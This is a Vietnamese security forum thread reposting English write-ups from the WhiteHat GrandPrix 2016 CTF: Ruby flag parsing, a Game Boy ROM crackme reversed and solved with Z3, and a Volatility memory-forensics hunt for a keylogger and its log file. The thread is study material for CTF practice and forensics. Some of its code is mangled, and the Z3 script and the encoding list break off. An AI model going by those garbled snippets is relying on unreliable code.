    • Not the good flag …
    • Description said Submit: WhiteHat{SHA1(flag)}, it depends if flag means Flag{xxx} or xxx.
    • SHA1 the unformated flag:
    Mã:
    [[email protected]]–––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/out/EasyExtrack]
    $ printf %s 'bruteforce_will_help_you' | sha1sum                                                                    
    31bd8aa56447ea1c703d0943e175a06a5c4ee614  -
    • Format the flag: WhiteHat{31bd8aa56447ea1c703d0943e175a06a5c4ee614}.
    • This time this is the good one.
    Here was my ruby script:

    Mã:
    #!/usr/bin/ruby
    (1..30).each do |num|
        raw_flag = File.read('flag'+num.to_s+'.txt')
        # Not sanitized flags
        puts 'raw: '.concat(raw_flag)
        only_flag = raw_flag.match(/\{([a-z0-9]{33})\}/).captures[0]
        # Sanitized flags
        puts only_flag.gsub(/[^0-9a-fA-F]/, '')
    end
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  13. nQg

    nQg W-------

    Tham gia: 05/01/15, 03:01 PM
    Bài viết: 25
    Đã được thích: 14
    Điểm thành tích:
    18
    Last edited by a moderator: 06/01/17, 01:01 PM
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  14. sunny

    sunny Điều hành viên Thành viên BQT

    Tham gia: 30/06/14, 10:06 PM
    Bài viết: 1,882
    Đã được thích: 855
    Điểm thành tích:
    113
    Writeup bài Cơm hến by LS



    Summary: Reverse engineering of a Game Boy ROM and computation of the key with Z3.

    Tools:
    This is a write-up for the “Com hen” challenge from WhiteHat GrandPrix 2016 CTF.

    The provided binary is a Game Boy ROM prompting for a key:
    [​IMG]




    Inputting a wrong key results in this:

    [​IMG]




    I started by looking at the strings:

    [​IMG]




    This sure looks interesting but there is no xrefs for these strings. However, searching for immediate values leads us to an interesting function with two basic blocks at the end:

    [​IMG]



    Since each of these basic blocks are referencing respectively success and fail strings, we can safely assume that sub_1DDD is used to print strings.

    After some renaming and immediate to offset conversions we end up with the following:


    [​IMG]


    Let’s see the code path we need to follow to end in the success basic block:

    [​IMG]



    The first check is in the first basic block. In order to get some context, I am putting a breakpoint at 0x5A6 in BGB and provide the following input:
    ABCDEFGHIJKLMNOPQRSTUVWXYZ
    [​IMG]



    When the breakpoint triggers, we can see that the code is actually comparing the byte at 0xC0B7 to 0x45, ie, the 24th char of our input must be an ‘E’.

    Also, we can see that our input is stored at 0xC0A0 and that there is the following 32 bytes string at 0xC0D2:
    3YU8UV86XYZY4W4659756ZUY69582043
    Back to our function, the second check depends on the “de” register which is set by sub_86A:

    [​IMG]



    Which is nothing more than a string compare function, loading two strings from the stack and outputting the result in the “de” register.

    Now let’s get some context with a breakpoint at 0x86A and the following input (‘E’ at the 24th position in order to pass the first check):
    ABCDEFGHIJKLMNOPQRSTUVWEYZ
    [​IMG]



    The two compared strings are at 0xC0A0 and 0xC0D2, ie, our input and the mysterious 32 bytes string.

    Moreover, our input changed, it is now:

    VWXYZABCDEFGHIJKLMNOPQRZTU

    Looks like a dumb ROT(21). However, trying to input ROT(-21, “3YU8UV86XYZY4W4659756ZUY69582043”) as key does not work.

    I then started to look at sub_4E0 since it is the only function that is called between the first check and the strcmp.

    The function is rather long, but after some RE, the algorithm is actually quite simple. Here is the equivalent C code:

    Mã:
    // Check if c is a number short sub_436(unsigned char c) { return c = '0'; } // Get distance between c1 and c2 short sub_40D(unsigned char c1, unsigned char c2) { int ret = c1 - c2; return ret >= 0 ? ret : -ret; } // Do one hash round void sub_457(unsigned char* key, unsigned char last, short distance) { for (unsigned char* i = key; *i != 0; ++i) { if (sub_436(*i)) continue; *i += distance; if (*i > 0x5A) *i += 0xE6; } } // Hash the key void sub_4E0(unsigned char* key) { unsigned char last = 0x41; for (unsigned char* i = key; *i != 0; ++i) { if (sub_436(*i)) continue; short distance = sub_40D(last, *i); sub_457(key, last, distance); last = *i; } }
    
    Thus, the crackme is equivalent to the following C program:

    Mã:
    #include  #include  short is_number(unsigned char c) { return c = '0'; } short get_distance(unsigned char c1, unsigned char c2) { int ret = c1 - c2; return ret >= 0 ? ret : -ret; } void hash_round(unsigned char* key, unsigned char last, short distance) { for (unsigned char* i = key; *i != 0; ++i) { if (is_number(*i)) continue; *i += distance; if (*i > 0x5A) *i += 0xE6; } } void hash_key(unsigned char* key) { unsigned char last = 0x41; for (unsigned char* i = key; *i != 0; ++i) { if (is_number(*i)) continue; short distance = get_distance(last, *i); hash_round(key, last, distance); last = *i; } } int main(void) { unsigned char key[50]; gets(key); hash_key(key); if (!strcmp("3YU8UV86XYZY4W4659756ZUY69582043", key)) puts("Success"); else puts("Fail"); }
    
    Let’s fire up Z3:

    Mã:
    #! /usr/bin/env python2 from z3 import * def abs(x): return If(x >= 0, x, -x) def adjust(x): return If(x
     
    Last edited by a moderator: 07/01/17, 09:01 AM
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  15. sunny

    sunny Điều hành viên Thành viên BQT

    Tham gia: 30/06/14, 10:06 PM
    Bài viết: 1,882
    Đã được thích: 855
    Điểm thành tích:
    113
    [h=3]Writeup bài Banh it la gai by rawsec

    Description[/h] [h=2]Solution[/h]
    TL;DR: incomplete write-up.
    • Download the zip.
    • Extract it.
    • We have a raw image.
    • Let’s see what we can do with Volatility:





    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48

    [[email protected]]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
    $ volatility -f bkav5.raw imageinfo
    Volatility Foundation Volatility Framework 2.5
    INFO : volatility.debug : Determining profile based on KDBG search...
    Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
    AS Layer1 : IA32PagedMemoryPae (Kernel AS)
    AS Layer2 : FileAddressSpace (/home/noraj/CTF/WhiteHat_GrandPrix/2016/For2/bkav5.raw)
    PAE type : PAE
    DTB : 0x334000L
    KDBG : 0x8054d2e0L
    Number of Processors : 2
    Image Type (Service Pack) : 3
    KPCR for CPU 0 : 0xffdff000L
    KPCR for CPU 1 : 0xfd24c000L
    KUSER_SHARED_DATA : 0xffdf0000L
    Image date and time : 2016-11-06 16:47:44 UTC+0000
    Image local date and time : 2016-11-06 23:47:44 +0700
    [[email protected]]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
    $ volatility -f bkav5.raw --profile=WinXPSP2x86 pstree
    Volatility Foundation Volatility Framework 2.5
    Name Pid PPid Thds Hnds Time
    -------------------------------------------------- ------ ------ ------ ------ ----
    0x8107e020:System 4 0 60 228 1970-01-01 00:00:00 UTC+0000
    . 0xff596808:smss.exe 544 4 3 17 2016-11-06 16:44:22 UTC+0000
    .. 0xff4b4da0:winlogon.exe 644 544 25 524 2016-11-06 16:44:23 UTC+0000
    ... 0xff609998:services.exe 744 644 13 246 2016-11-06 16:44:25 UTC+0000
    .... 0xff4a3d70:vmacthlp.exe 928 744 1 25 2016-11-06 16:44:26 UTC+0000
    .... 0xff67a7e8:spoolsv.exe 1600 744 6 54 2016-11-06 16:47:21 UTC+0000
    .... 0xff5cfda0:svchost.exe 992 744 10 178 2016-11-06 16:44:27 UTC+0000
    .... 0xff583888:svchost.exe 1348 744 6 119 2016-11-06 16:44:27 UTC+0000
    .... 0xff59a7b8:svchost.exe 944 744 7 122 2016-11-06 16:44:26 UTC+0000
    .... 0x80fdec10:svchost.exe 180 744 5 88 2016-11-06 16:44:45 UTC+0000
    .... 0xff481020:svchost.exe 1876 744 15 194 2016-11-06 16:47:07 UTC+0000
    .... 0xff58c7b8:svchost.exe 1244 744 5 59 2016-11-06 16:44:27 UTC+0000
    ... 0xff5be460:lsass.exe 760 644 25 332 2016-11-06 16:44:25 UTC+0000
    .. 0xff5974d8:csrss.exe 616 544 10 265 2016-11-06 16:44:22 UTC+0000
    0x80ecf928:explorer.exe 1740 1704 17 424 2016-11-06 16:44:32 UTC+0000
    . 0xff5bf138:DumpIt.exe 308 1740 1 27 2016-11-06 16:47:42 UTC+0000
    . 0x80eb7690:rundll32.exe 1884 1740 4 72 2016-11-06 16:44:37 UTC+0000
    . 0xff5b2888:keylog.exe 2020 1740 2 35 2016-11-06 16:47:17 UTC+0000
    [[email protected]]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
    $ volatility -f bkav5.raw --profile=WinXPSP2x86 procdump -p 2020 --dump-dir=.
    Volatility Foundation Volatility Framework 2.5
    Process(V) ImageBase Name Result
    ---------- ---------- -------------------- ------
    0xff5b2888 0x00400000 keylog.exe OK: executable.2020.exe
    • See a supicious keylog.exe so we dumped it.
    • Upload it to Virustotal and to Hybrid Analysis.
    • Detection ratio: 4 / 56, a keylogger.
    • Just look for quick win:





    1
    2
    3
    4
    5
    6
    7
    8
    9

    [[email protected]]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
    $ strings keylog.exe_executable.2020.exe
    [...]
    %c - %d
    c:/windows/keylog.log
    [WIN]
    [...]
    • The malware is saving its collected informations in c:/windows/keylog.log.
    • Let’s find the file and dump it:





    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12

    [[email protected]]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
    $ volatility -f bkav5.raw --profile=WinXPSP2x86 filescan | grep -i 'keylog.log'
    Volatility Foundation Volatility Framework 2.5
    Offset(P) #Ptr #Hnd Access Name
    ------------------ ------ ------ ------ ----
    0x00000000010410a0 1 0 RW-rw- \Device\HarddiskVolume1\WINDOWS\keylog.log
    [[email protected]]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
    $ volatility -f bkav5.raw --profile=WinXPSP2x86 dumpfiles -Q 0x00000000010410a0 --dump-dir=.
    Volatility Foundation Volatility Framework 2.5
    DataSectionObject 0x010410a0 None \Device\HarddiskVolume1\WINDOWS\keylog.log
    • But this is a non standard encoding:





    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38

    [[email protected]]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
    $ file keylog.log_file.None.0x80eb7008.dat
    keylog.log_file.None.0x80eb7008.dat: Non-ISO extended-ASCII text, with NEL line terminators
    [[email protected]]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
    $ xxd keylog.log_file.None.0x80eb7008.dat
    00000000: 8589 9790 83bd b3ba 859b b0aa bbac 83b6 ................
    00000010: bbb2 b2b1 859b b0aa bbac 83a9 bbb2 b2b1 ................
    00000020: 859c 9f9d 958d 8e9f 9d9b 83bd b1b3 bbfe ................
    00000030: a7b1 abfe b9ab a7ff 859c 9f9d 958d 8e9f ................
    00000040: 9d9b 83fe e185 9bb0 aabb ac83 a9bb b2fe ................
    00000050: b1ac fea9 bbb2 b2fe e185 9bb0 aabb ac83 ................
    00000060: a9b6 bfaa bbac a8bb acfe 869a 859b b0aa ................
    00000070: bbac 8385 8997 9083 bdb6 acb1 b3bb 859b ................
    00000080: b0aa bbac 83a9 bbb2 feb1 ac85 9c9f 9d95 ................
    00000090: 8d8e 9f9d 9b83 859c 9f9d 958d 8e9f 9d9b ................
    000000a0: 8385 9c9f 9d95 8d8e 9f9d 9b83 b2bd b1b3 ................
    000000b0: bbfe b1ac fea9 bbb2 bdb1 b3bb 859b b0aa ................
    000000c0: bbac 83ab b6b3 fef0 f0f0 fe85 9c9f 9d95 ................
    000000d0: 8d8e 9f9d 9b83 859c 9f9d 958d 8e9f 9d9b ................
    000000e0: 8385 9c9f 9d95 8d8e 9f9d 9b83 859c 9f9d ................
    000000f0: 958d 8e9f 9d9b 8385 9c9f 9d95 8d8e 9f9d ................
    00000100: 9b83 859c 9f9d 958d 8e9f 9d9b 8385 9c9f ................
    00000110: 9d95 8d8e 9f9d 9b83 859c 9f9d 958d 8e9f ................
    00000120: 9d9b 8385 9c9f 9d95 8d8e 9f9d 9b83 859c ................
    00000130: 9f9d 958d 8e9f 9d9b 8385 9c9f 9d95 8d8e ................
    00000140: 9f9d 9b83 859c 9f9d 958d 8e9f 9d9b 8385 ................
    00000150: 9c9f 9d95 8d8e 9f9d 9b83 b7fe b9b1 aafe ................
    00000160: b7aa fef0 feaa b6bf aafe a9bb b2bd b1b3 ................
    00000170: bbfe e49a 859d aaac b283 aab8 bf85 9bb0 ................
    00000180: aabb ac83 859d aaac b283 aab8 bdbb b1b1 ................
    00000190: b5f0 bdb1 b385 9bb0 aabb ac83 aab6 b7ad ................
    000001a0: b7ad b3a7 b8b2 bfb9 d7a5 a385 92bb b8aa ................
    000001b0: 9fac acb1 a983 b5ba b7bb b5b5 bab7 eced ................
    000001c0: e7ed e9ba b8b6 ede7 b4ad b2ad bab5 e7ed ................
    000001d0: 859b b0aa bbac 83aa b6bf b0b5 a7b1 abff ................
    000001e0: 859b b0aa bbac 83e4 9abf bcbd babb b8b9 ................
    000001f0: b6b7 b5b2 b3b0 b1ae afac adaa e1e1 e1a7 ................
    • This is nor UTF-8, nor WINDOWS-1252/C1252.
    • Try to determine what kind of encoding this is (source: superuser.com):





    1
    2
    3
    4
    5
    6

    $ iconv --list | sed 's/\/\/$//' | sort > encodings.list
    $ for a in `cat encodings.list`; do
    printf "$a "
    iconv -f $a -t UTF-8 keylog.log_file.None.0x80eb7008.dat > /dev/null 2>&1 \
    && echo "ok: $a" || echo "fail: $a"
    done | tee result.txt
    • Let’s take a look at results:





    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    181
    182
    183
    184
    185
    186
    187
    188
    189
    190
    191
    192
    193
    194
    195
    196
    197
    198
    199
    200
    201
    202
    203
    204
    205
    206
    207
    208
    209
    210
    211
    212
    213
    214
    215
    216
    217
    218
    219
    220
    221
    222
    223
    224
    225
    226
    227
    228
    229
    230
    231
    232
    233
    234
    235
    236
    237
    238
    239
    240
    241
    242
    243
    244
    245
    246
    247
    248
    249
    250
    251
    252
    253
    254
    255
    256
    257
    258
    259
    260
    261
    262
    263
    264
    265
    266
    267
    268
    269
    270
    271
    272
    273
    274
    275
    276
    277
    278
    279
    280
    281
    282
    283
    284
    285
    286
    287
    288
    289
    290
    291
    292
    293
    294
    295
    296
    297
    298
    299
    300
    301
    302
    303
    304
    305
    306
    307
    308
    309
    310
    311
    312
    313
    314
    315
    316
    317
    318
    319
    320
    321
    322
    323
    324
    325
    326
    327
    328
    329
    330
    331
    332
    333
    334
    335
    336
    337
    338
    339
    340
    341
    342
    343
    344
    345
    346
    347
    348
    349
    350
    351
    352
    353
    354
    355
    356
    357
    358
    359
    360
    361
    362
    363
    364
    365
    366
    367
    368
    369
    370
    371
    372
    373
    374
    375
    376
    377
    378
    379
    380
    381
    382
    383
    384
    385
    386
    387
    388
    389
    390
    391
    392
    393
    394
    395
    396
    397
    398
    399
    400
    401
    402
    403
    404
    405
    406
    407
    408
    409
    410
    411
    412
    413
    414
    415
    416
    417
    418
    419
    420
    421
    422
    423
    424
    425
    426
    427
    428
    429
    430
    431
    432
    433
    434
    435
    436
    437
    438
    439
    440
    441
    442
    443
    444
    445
    446
    447
    448
    449
    450
    451
    452
    453
    454
    455
    456
    457
    458
    459
    460
    461
    462
    463
    464
    465
    466
    467
    468
    469
    470
    471
    472
    473
    474
    475
    476
    477
    478
    479
    480
    481
    482
    483
    484
    485
    486
    487
    488
    489
    490
    491
    492
    493
    494

    1026 ok: 1026
    1047 ok: 1047
    437 ok: 437
    500 ok: 500
    500V1 ok: 500V1
    850 ok: 850
    851 ok: 851
    852 ok: 852
    855 ok: 855
    860 ok: 860
    861 ok: 861
    862 ok: 862
    863 ok: 863
    865 ok: 865
    866 ok: 866
    866NAV ok: 866NAV
    8859_1 ok: 8859_1
    8859_2 ok: 8859_2
    8859_4 ok: 8859_4
    8859_5 ok: 8859_5
    8859_9 ok: 8859_9
    BALTIC ok: BALTIC
    CP037 ok: CP037
    CP10007 ok: CP10007
    CP1025 ok: CP1025
    CP1026 ok: CP1026
    CP1047 ok: CP1047
    CP1070 ok: CP1070
    CP1079 ok: CP1079
    CP1081 ok: CP1081
    CP1084 ok: CP1084
    CP1097 ok: CP1097
    CP1112 ok: CP1112
    CP1122 ok: CP1122
    CP1123 ok: CP1123
    CP1124 ok: CP1124
    CP1125 ok: CP1125
    CP1129 ok: CP1129
    CP1130 ok: CP1130
    CP1137 ok: CP1137
    CP1140 ok: CP1140
    CP1141 ok: CP1141
    CP1142 ok: CP1142
    CP1143 ok: CP1143
    CP1144 ok: CP1144
    CP1145 ok: CP1145
    CP1146 ok: CP1146
    CP1147 ok: CP1147
    CP1148 ok: CP1148
    CP1149 ok: CP1149
    CP1153 ok: CP1153
    CP1154 ok: CP1154
    CP1155 ok: CP1155
    CP1156 ok: CP1156
    CP1157 ok: CP1157
    CP1158 ok: CP1158
    CP1160 ok: CP1160
    CP1163 ok: CP1163
    CP1164 ok: CP1164
    CP1166 ok: CP1166
    CP1167 ok: CP1167
    CP1251 ok: CP1251
    CP1256 ok: CP1256
    CP1282 ok: CP1282
    CP1390 ok: CP1390
    CP1399 ok: CP1399
    CP273 ok: CP273
    CP278 ok: CP278
    CP280 ok: CP280
    CP282 ok: CP282
    CP284 ok: CP284
    CP285 ok: CP285
    CP297 ok: CP297
    CP437 ok: CP437
    CP500 ok: CP500
    CP5347 ok: CP5347
    CP737 ok: CP737
    CP770 ok: CP770
    CP771 ok: CP771
    CP772 ok: CP772
    CP773 ok: CP773
    CP774 ok: CP774
    CP775 ok: CP775
    CP819 ok: CP819
    CP850 ok: CP850
    CP851 ok: CP851
    CP852 ok: CP852
    CP855 ok: CP855
    CP860 ok: CP860
    CP861 ok: CP861
    CP862 ok: CP862
    CP863 ok: CP863
    CP865 ok: CP865
    CP866 ok: CP866
    CP866NAV ok: CP866NAV
    CP870 ok: CP870
    CP871 ok: CP871
    CP880 ok: CP880
    CP901 ok: CP901
    CP902 ok: CP902
    CP9030 ok: CP9030
    CP912 ok: CP912
    CP915 ok: CP915
    CP920 ok: CP920
    CP921 ok: CP921
    CP922 ok: CP922
    CP9448 ok: CP9448
    CP-HU ok: CP-HU
    CPIBM861 ok: CPIBM861
    CSIBM037 ok: CSIBM037
    CSIBM1025 ok: CSIBM1025
    CSIBM1026 ok: CSIBM1026
    CSIBM1097 ok: CSIBM1097
    CSIBM1112 ok: CSIBM1112
    CSIBM1122 ok: CSIBM1122
    CSIBM1123 ok: CSIBM1123
    CSIBM1124 ok: CSIBM1124
    CSIBM1129 ok: CSIBM1129
    CSIBM1130 ok: CSIBM1130
    CSIBM1137 ok: CSIBM1137
    CSIBM1140 ok: CSIBM1140
    CSIBM1141 ok: CSIBM1141
    CSIBM1142 ok: CSIBM1142
    CSIBM1143 ok: CSIBM1143
    CSIBM1144 ok: CSIBM1144
    CSIBM1145 ok: CSIBM1145
    CSIBM1146 ok: CSIBM1146
    CSIBM1147 ok: CSIBM1147
    CSIBM1148 ok: CSIBM1148
    CSIBM1149 ok: CSIBM1149
    CSIBM1153 ok: CSIBM1153
    CSIBM1154 ok: CSIBM1154
    CSIBM1155 ok: CSIBM1155
    CSIBM1156 ok: CSIBM1156
    CSIBM1157 ok: CSIBM1157
    CSIBM1158 ok: CSIBM1158
    CSIBM1160 ok: CSIBM1160
    CSIBM1163 ok: CSIBM1163
    CSIBM1164 ok: CSIBM1164
    CSIBM1166 ok: CSIBM1166
    CSIBM1167 ok: CSIBM1167
    CSIBM1390 ok: CSIBM1390
    CSIBM1399 ok: CSIBM1399
    CSIBM273 ok: CSIBM273
    CSIBM277 ok: CSIBM277
    CSIBM278 ok: CSIBM278
    CSIBM280 ok: CSIBM280
    CSIBM284 ok: CSIBM284
    CSIBM285 ok: CSIBM285
    CSIBM297 ok: CSIBM297
    CSIBM500 ok: CSIBM500
    CSIBM5347 ok: CSIBM5347
    CSIBM851 ok: CSIBM851
    CSIBM855 ok: CSIBM855
    CSIBM860 ok: CSIBM860
    CSIBM863 ok: CSIBM863
    CSIBM865 ok: CSIBM865
    CSIBM866 ok: CSIBM866
    CSIBM870 ok: CSIBM870
    CSIBM871 ok: CSIBM871
    CSIBM880 ok: CSIBM880
    CSIBM901 ok: CSIBM901
    CSIBM902 ok: CSIBM902
    CSIBM9030 ok: CSIBM9030
    CSIBM921 ok: CSIBM921
    CSIBM922 ok: CSIBM922
    CSIBM9448 ok: CSIBM9448
    CSISO111ECMACYRILLIC ok: CSISO111ECMACYRILLIC
    CSISO139CSN369103 ok: CSISO139CSN369103
    CSISO143IECP271 ok: CSISO143IECP271
    CSISOLATIN1 ok: CSISOLATIN1
    CSISOLATIN2 ok: CSISOLATIN2
    CSISOLATIN4 ok: CSISOLATIN4
    CSISOLATIN5 ok: CSISOLATIN5
    CSISOLATIN6 ok: CSISOLATIN6
    CSISOLATINCYRILLIC ok: CSISOLATINCYRILLIC
    CSKOI8R ok: CSKOI8R
    CSMACINTOSH ok: CSMACINTOSH
    CSN_369103 ok: CSN_369103
    CSPC775BALTIC ok: CSPC775BALTIC
    CSPC850MULTILINGUAL ok: CSPC850MULTILINGUAL
    CSPC862LATINHEBREW ok: CSPC862LATINHEBREW
    CSPC8CODEPAGE437 ok: CSPC8CODEPAGE437
    CSPCP852 ok: CSPCP852
    CSUNICODE ok: CSUNICODE
    CWI ok: CWI
    CWI-2 ok: CWI-2
    CYRILLIC ok: CYRILLIC
    EBCDIC-CP-BE ok: EBCDIC-CP-BE
    EBCDIC-CP-CA ok: EBCDIC-CP-CA
    EBCDIC-CP-CH ok: EBCDIC-CP-CH
    EBCDIC-CP-DK ok: EBCDIC-CP-DK
    EBCDIC-CP-ES ok: EBCDIC-CP-ES
    EBCDIC-CP-FI ok: EBCDIC-CP-FI
    EBCDIC-CP-FR ok: EBCDIC-CP-FR
    EBCDIC-CP-GB ok: EBCDIC-CP-GB
    EBCDIC-CP-IS ok: EBCDIC-CP-IS
    EBCDIC-CP-IT ok: EBCDIC-CP-IT
    EBCDIC-CP-NL ok: EBCDIC-CP-NL
    EBCDIC-CP-NO ok: EBCDIC-CP-NO
    EBCDIC-CP-ROECE ok: EBCDIC-CP-ROECE
    EBCDIC-CP-SE ok: EBCDIC-CP-SE
    EBCDIC-CP-US ok: EBCDIC-CP-US
    EBCDIC-CP-WT ok: EBCDIC-CP-WT
    EBCDIC-CP-YU ok: EBCDIC-CP-YU
    EBCDIC-CYRILLIC ok: EBCDIC-CYRILLIC
    EBCDIC-INT1 ok: EBCDIC-INT1
    ECMA-128 ok: ECMA-128
    ECMACYRILLIC ok: ECMACYRILLIC
    ECMA-CYRILLIC ok: ECMA-CYRILLIC
    GEORGIAN-ACADEMY ok: GEORGIAN-ACADEMY
    GEORGIAN-PS ok: GEORGIAN-PS
    IBM037 ok: IBM037
    IBM1025 ok: IBM1025
    IBM-1025 ok: IBM-1025
    IBM1026 ok: IBM1026
    IBM1047 ok: IBM1047
    IBM-1047 ok: IBM-1047
    IBM1097 ok: IBM1097
    IBM-1097 ok: IBM-1097
    IBM1112 ok: IBM1112
    IBM-1112 ok: IBM-1112
    IBM1122 ok: IBM1122
    IBM-1122 ok: IBM-1122
    IBM1123 ok: IBM1123
    IBM-1123 ok: IBM-1123
    IBM1124 ok: IBM1124
    IBM-1124 ok: IBM-1124
    IBM1129 ok: IBM1129
    IBM-1129 ok: IBM-1129
    IBM1130 ok: IBM1130
    IBM-1130 ok: IBM-1130
    IBM1137 ok: IBM1137
    IBM-1137 ok: IBM-1137
    IBM1140 ok: IBM1140
    IBM-1140 ok: IBM-1140
    IBM1141 ok: IBM1141
    IBM-1141 ok: IBM-1141
    IBM1142 ok: IBM1142
    IBM-1142 ok: IBM-1142
    IBM1143 ok: IBM1143
    IBM-1143 ok: IBM-1143
    IBM1144 ok: IBM1144
    IBM-1144 ok: IBM-1144
    IBM1145 ok: IBM1145
    IBM-1145 ok: IBM-1145
    IBM1146 ok: IBM1146
    IBM-1146 ok: IBM-1146
    IBM1147 ok: IBM1147
    IBM-1147 ok: IBM-1147
    IBM1148 ok: IBM1148
    IBM-1148 ok: IBM-1148
    IBM1149 ok: IBM1149
    IBM-1149 ok: IBM-1149
    IBM1153 ok: IBM1153
    IBM-1153 ok: IBM-1153
    IBM1154 ok: IBM1154
    IBM-1154 ok: IBM-1154
    IBM1155 ok: IBM1155
    IBM-1155 ok: IBM-1155
    IBM1156 ok: IBM1156
    IBM-1156 ok: IBM-1156
    IBM1157 ok: IBM1157
    IBM-1157 ok: IBM-1157
    IBM1158 ok: IBM1158
    IBM-1158 ok: IBM-1158
    IBM1160 ok: IBM1160
    IBM-1160 ok: IBM-1160
    IBM1163 ok: IBM1163
    IBM-1163 ok: IBM-1163
    IBM1164 ok: IBM1164
    IBM-1164 ok: IBM-1164
    IBM1166 ok: IBM1166
    IBM-1166 ok: IBM-1166
    IBM1167 ok: IBM1167
    IBM-1167 ok: IBM-1167
    IBM1390 ok: IBM1390
    IBM-1390 ok: IBM-1390
    IBM1399 ok: IBM1399
    IBM-1399 ok: IBM-1399
    IBM256 ok: IBM256
    IBM273 ok: IBM273
    IBM277 ok: IBM277
    IBM278 ok: IBM278
    IBM280 ok: IBM280
    IBM284 ok: IBM284
    IBM285 ok: IBM285
    IBM297 ok: IBM297
    IBM437 ok: IBM437
    IBM500 ok: IBM500
    IBM5347 ok: IBM5347
    IBM-5347 ok: IBM-5347
    IBM775 ok: IBM775
    IBM819 ok: IBM819
    IBM848 ok: IBM848
    IBM850 ok: IBM850
    IBM851 ok: IBM851
    IBM852 ok: IBM852
    IBM855 ok: IBM855
    IBM860 ok: IBM860
    IBM861 ok: IBM861
    IBM862 ok: IBM862
    IBM863 ok: IBM863
    IBM865 ok: IBM865
    IBM866 ok: IBM866
    IBM866NAV ok: IBM866NAV
    IBM870 ok: IBM870
    IBM871 ok: IBM871
    IBM880 ok: IBM880
    IBM901 ok: IBM901
    IBM-901 ok: IBM-901
    IBM902 ok: IBM902
    IBM-902 ok: IBM-902
    IBM9030 ok: IBM9030
    IBM-9030 ok: IBM-9030
    IBM912 ok: IBM912
    IBM915 ok: IBM915
    IBM920 ok: IBM920
    IBM921 ok: IBM921
    IBM-921 ok: IBM-921
    IBM922 ok: IBM922
    IBM-922 ok: IBM-922
    IBM9448 ok: IBM9448
    IBM-9448 ok: IBM-9448
    IEC_P271 ok: IEC_P271
    IEC_P27-1 ok: IEC_P27-1
    ISO-10646/UCS2/ ok: ISO-10646/UCS2/
    ISO_11548-1 ok: ISO_11548-1
    ISO11548-1 ok: ISO11548-1
    ISO6937 ok: ISO6937
    ISO_6937 ok: ISO_6937
    ISO_6937:1992 ok: ISO_6937:1992
    ISO88591 ok: ISO88591
    ISO_8859-1 ok: ISO_8859-1
    ISO-8859-1 ok: ISO-8859-1
    ISO8859-1 ok: ISO8859-1
    ISO885910 ok: ISO885910
    ISO_8859-10 ok: ISO_8859-10
    ISO-8859-10 ok: ISO-8859-10
    ISO8859-10 ok: ISO8859-10
    ISO_8859-10:1992 ok: ISO_8859-10:1992
    ISO_8859-1:1987 ok: ISO_8859-1:1987
    ISO885913 ok: ISO885913
    ISO-8859-13 ok: ISO-8859-13
    ISO8859-13 ok: ISO8859-13
    ISO885914 ok: ISO885914
    ISO_8859-14 ok: ISO_8859-14
    ISO-8859-14 ok: ISO-8859-14
    ISO8859-14 ok: ISO8859-14
    ISO_8859-14:1998 ok: ISO_8859-14:1998
    ISO885915 ok: ISO885915
    ISO_8859-15 ok: ISO_8859-15
    ISO-8859-15 ok: ISO-8859-15
    ISO8859-15 ok: ISO8859-15
    ISO_8859-15:1998 ok: ISO_8859-15:1998
    ISO885916 ok: ISO885916
    ISO_8859-16 ok: ISO_8859-16
    ISO-8859-16 ok: ISO-8859-16
    ISO8859-16 ok: ISO8859-16
    ISO_8859-16:2001 ok: ISO_8859-16:2001
    ISO88592 ok: ISO88592
    ISO_8859-2 ok: ISO_8859-2
    ISO-8859-2 ok: ISO-8859-2
    ISO8859-2 ok: ISO8859-2
